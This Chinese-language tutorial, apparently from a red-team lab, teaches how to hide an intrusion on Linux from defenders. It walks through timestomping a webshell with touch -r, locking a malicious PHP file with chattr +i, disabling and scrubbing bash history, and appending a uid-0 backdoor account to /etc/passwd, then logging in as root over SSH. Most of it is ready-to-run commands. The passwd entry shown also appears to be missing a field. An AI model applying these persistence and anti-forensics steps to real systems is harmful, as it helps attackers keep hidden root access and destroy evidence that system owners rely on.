1.文件创建时间

如果蓝队根据文件修改时间来判断文件是否为后门，如参考index.php的时间再来看shell.php的时间就 可以判断shell.php的生成时间有问题

解决方法：

touch -r index.php shell.php

我们打开终端 新建test.php文件

我们来查看信息

发现两个文件的属性是一样的

touch命令用于修改文件或者目录的时间属性，包括存取时间和更改时间。若文件不存在，系统会建立一个新的文件。

2.文件锁定

在Linux中，使用chattr命令来防止root和其他管理用户误删除和修改重要文件及目录，此权限用ls -l是查看不出来的，从而达到隐藏权限的目的。

chattr +i evil.php	#锁定文件
rm -rf evil.php	#提示禁止删除
lsattr	evil.php	#属性查看
chattr -i evil.php	#解除锁定
rm -rf evil.php	#彻底删除文件

我们现在先列举出来

ls -al *.php

chattr +i test.php

说明我们权限不够

我们用sudo

这下我们修改好

然后我们来删除这个文件

发现我们不能够删除这个文件

我们来查看属性

lsattr test.php

我们如果要删除 那麽我们 先去掉属性

这下我们就删除了

3.历史操作命令

在shell中执行的命令，不希望被记录在命令行历史中，如何在linux中开启无痕操作模式呢？ 技巧一：只针对你的工作关闭历史记录

[space]set +o history	#备注：[space] 表示空格。并且由于空格的缘故，该命令本身也不会被记录

上面的命令会临时禁用历史功能，这意味着在这命令之后你执行的所有操作都不会记录到历史中，然而 这个命令之前的所有东西都会原样记录在历史列表中。

要重新开启历史功能，执行下面的命令：

[Space]set -o history	#将环境恢复原状

我们首先输入

cat /etc/passwd

然后在输入

history

我们就可以看见刚才输入的指令

然后我们现在输入

[space]set +o history

然后输入ifconfig

然后在输入history

哦我们没有发现指令了

然后我们推出 输入

[Space]set -o history

然后输入ifconfig

然后输入history

发现里边有记录了

技巧二：从历史记录中删除指定的命令

假设历史记录中已经包含了一些你不希望记录的命令。这种情况下我们怎么办？很简单。通过下面的命 令来删除：

history | grep "keyword"

输出历史记录中匹配的命令，每一条前面会有个数字。从历史记录中删除那个指定的项：

history -d [num]

删除大规模历史操作记录，这里，我们只保留前150行：

sed -i '150,$d' ~/.bash_history

4.passwd增加用户

/etc/passwd 各部分含义：
用户名：密码：用户ID：组ID：身份描述：用户的家目录：用户登录后所使用的SHELL

/etc/shadow 各部分含义：

用户名：密码的MD5加密值：自系统使用以来口令被修改的天数：口令的最小修改间隔：口令更改的周 期：口令失效的天数：口令失效以后帐号会被锁定多少天：用户帐号到期时间：保留字段尚未使用

写入举例：

1.增加超级用户

perl -le 'print crypt("passwd","salt")' sadtCr0CILzv2

echo "m123:sadtCr0CILzv2:0:0:/root:/bin/bash" >> /etc/passwd

首先我们先输入

perl -le 'print crypt("passwd","salt")'

然后生成

sadtCr0CILzv2

然后我们

echo "m123:sadtCr0CILzv2:0:0:/root:/bin/bash" >> /etc/passwd

在输入

cat /etc/passwd

发现已经写入进来

也是root权限

我们打开kail的ssh

ssh m123@192.168.25.153 密码是passwd

权限还是root